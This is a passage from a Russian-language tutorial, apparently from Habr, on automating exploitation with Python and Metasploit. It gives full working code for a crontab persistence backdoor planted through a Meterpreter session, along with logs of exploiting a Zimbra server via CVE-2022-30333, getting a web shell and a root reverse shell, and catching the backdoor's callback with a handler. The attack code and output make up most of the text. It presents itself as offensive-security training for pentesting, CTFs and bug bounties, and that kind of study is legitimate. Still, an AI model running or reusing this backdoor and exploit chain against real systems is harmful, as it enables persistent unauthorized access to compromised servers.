'wb') as f:         f.write(data)   def create_backdoor_task_in_crontab(         local_full_path_to_payload: Path | str,         remote_full_path_to_payload: Path | str,         meterpreter_session,         remote_full_path_to_cron_file: Path | str,         task_interval: str = "1" ) -> bool:      # Команда upload позволяет загружать файлы на взломанный хост     command = f"upload {local_full_path_to_payload} {remote_full_path_to_payload}"     meterpreter_session.write(command)     sleep(5)      logger.info(f"Полезная нагрузка {remote_full_path_to_payload} успешно загружена")      # После загрузки бэкдора выдаём ему права на исполнение     # Ключ -a позволяет передать аргументы при вызове исполняемого файла     # Ключ -H запускает команду в фоновом режиме     meterpreter_session.write(f"execute -f chmod -a '777 {remote_full_path_to_payload}' -H")     sleep(3)     # Задача для кронтаба, которая будет запускать бэкдор с указанным интервалом, в данном случае каждую минуту     cron_task = f"*/{task_interval} * * * * {remote_full_path_to_payload}"      # Записываем текущий список задач кронтаб в файл     meterpreter_session.write(f"execute -f /bin/bash -a \"-c 'crontab -l > {remote_full_path_to_cron_file}'\"")     meterpreter_session.read()     sleep(3)      meterpreter_session.write(f"cat {remote_full_path_to_cron_file}")     sleep(2)     output = meterpreter_session.read()     if cron_task in output:         logger.warning("Задача уже в кронтабе")     else:         # Если нашей задачи нет в файле, дописываем в конец файла нашу задачу         command = (             f"execute -f /bin/bash -a \"-c 'echo \\\"{cron_task}\\\" >> {remote_full_path_to_cron_file} '\""         )         meterpreter_session.write(command)         sleep(3)         meterpreter_session.write(f"cat {remote_full_path_to_cron_file}")         sleep(2)          output = meterpreter_session.read()         if cron_task in output:             logger.info("Задача для кронтаба успешно добавлена в файл")         else:             logger.error("Не удалось добавить задачу")             return False          # Перезаписываем в кронтаб файл с нашей таской на запуск бэкдора         command = f"execute -f bash -a '-c \"crontab {remote_full_path_to_cron_file}\"'"         meterpreter_session.write(command)         sleep(4)         meterpreter_session.read()      meterpreter_session.write(f"del {remote_full_path_to_cron_file}")     return True

Давайте в main.py предложим пользователю после завершения скрипта атаки запустить создание crontab бэкдора.

def main():     ...     if args.skip_scan or args.run_script:         ...         if args.run_script:             ...             run_script(exploit, args)         else:             ...             run_script(selected_exploit, args)      else:         ...         run_script(selected_exploit, args)     # Чтобы не парсить скрипты постэксплуатации, задаем их списком     payload_modules = [{         "path": os.path.join(os.getcwd(), "generic_payloads/linux_generic_payloads.py"),         "name": "generic_create_crontab_backdoor"     }]          # После запуска основного скрипта автоматической эксплуатации, предлагаем выбрать универсальный скрипт постэксплуатации     logger.info("Для linux доступны следующие скрипты постэксплуатации:")     for i, module in enumerate(payload_modules, start=1):         module["number"] = i         logger.info(f"[{i}] {module['name']}")      request_text = "Выбери модуль постэксплуатации: "     payload_module = parse_imput_number(payload_modules, request_text)          # Запускаем скрипт постэксплуатации, передавая название целевой функции     run_script(payload_module, args, payload_module["name"])   def run_script(selected_exploit: dict, args: argparse.Namespace, func_name="main"):     ...     logger.info("[+] Запуск скрипта с указаными параметрами")     import_and_run_func_from_path(selected_exploit["path"], config, func_name)   def import_and_run_func_from_path(file_path: str, config: dict, func_name: str):     ...     # Присваиваем переменной искомую функцию и запускаем ее     func_to_run = getattr(module, func_name)     func_to_run(config)

Если запустить обновленный скрипт, мы получим следующий результат:

└─# python3 main.py -run-script exploit_zimbra_unrar_rce -lhost 10.10.4.55 10.10.2.50 INFO: Пропускаем сканирование INFO: Выбран следующий скрипт для запуска: exploit_zimbra_unrar_rce INFO: [+] Запуск скрипта с указаными параметрами INFO: [+] Начало эксплуатации уязвимости CVE-2022-30333 INFO: [+] Создаем вредоносный архив с помощью модуля Metasploit INFO: Архив успешно создан: /root/.msf4/local/payload.rar INFO: {'50': 'Exploit: multi/handler'} INFO: [+] Письмо успешно отправлено INFO: Веб-шелл сработал: 200 INFO: {'15': {'type': 'meterpreter', 'tunnel_local': '10.10.4.55:4455', 'tunnel_peer': '10.10.2.50:57350', 'via_exploit': 'exploit/multi/handler', 'via_payload': 'payload/linux/x64/meterpreter/reverse_tcp', 'desc': 'Meterpreter', 'info': 'zimbra @ mail.ampire.corp', 'workspace': 'false', 'session_host': '10.10.2.50', 'session_port': 57350, 'target_host': '', 'username': 'root', 'uuid': 'ckofwmc2', 'exploit_uuid': 'zlyravuc', 'routes': '', 'arch': 'x64', 'platform': 'linux'}} INFO: [+] Meterpreter-сессия с Zimbra сервером успешно получена INFO: Для linux доступны следующие скрипты постэксплуатации: INFO: [1] generic_create_crontab_backdoor Выбери модуль постэксплуатации: 1 INFO: [+] Вы выбрали: generic_create_crontab_backdoor INFO: [+] Запуск скрипта с указаными параметрами INFO: Session environ:  Read 168 bytes from 1:  LANG=C USER=zimbra HOME=/opt/zimbra PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin  INFO: Полезная нагрузка /opt/zimbra/default_settings успешно загружена INFO: Задача для кронтаба успешно добавлена в файл INFO: Бэкдор упешно создан

Теперь мы можем проверить успешность создания бэкдора, для этого можно вручную запустить multi/handler:

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.4.55 lhost => 10.10.4.55 msf6 exploit(multi/handler) > set lport 6677 lport => 6677 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.4.55:6677  [*] Sending stage (3045380 bytes) to 10.10.2.50 [*] Meterpreter session 1 opened (10.10.4.55:6677 -> 10.10.2.50:39624)  meterpreter > 

Обработчик входящих подключений поймал meterpreter-сессию, что говорит об успешной работе кронтаб-бэкдора.

Что в итоге? 

Мы разобрали, как можно автоматизировать типовые задачи эксплуатации и постэксплуатации на базе связки Python + Metasploit Framework. Такой подход отлично вписывается в любые сценарии, будь то:

  • повседневные рабочие задачи,

  • изучение курсов по Offensive Securitry,

  • решение различных CTF-задач,

  • участие в Bug Bounty.

Вместо того, чтобы каждый раз вручную сканировать, запускать эксплойты, проверять сессии, закрепляться в системе, мы написали инструмент, который позволяет делать всё это гораздо быстрее, а главное — его можно дополнять и адаптировать под конкретные задачи.

Главное, что даёт автоматизация — свободу сосредоточиться на действительно важных вещах. А среди них — не забыть обновить софт и, конечно, сменить, наконец, тот самый шестизначный пароль.


ссылка на оригинал статьи https://habr.com/ru/articles/934088/


Комментарии

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *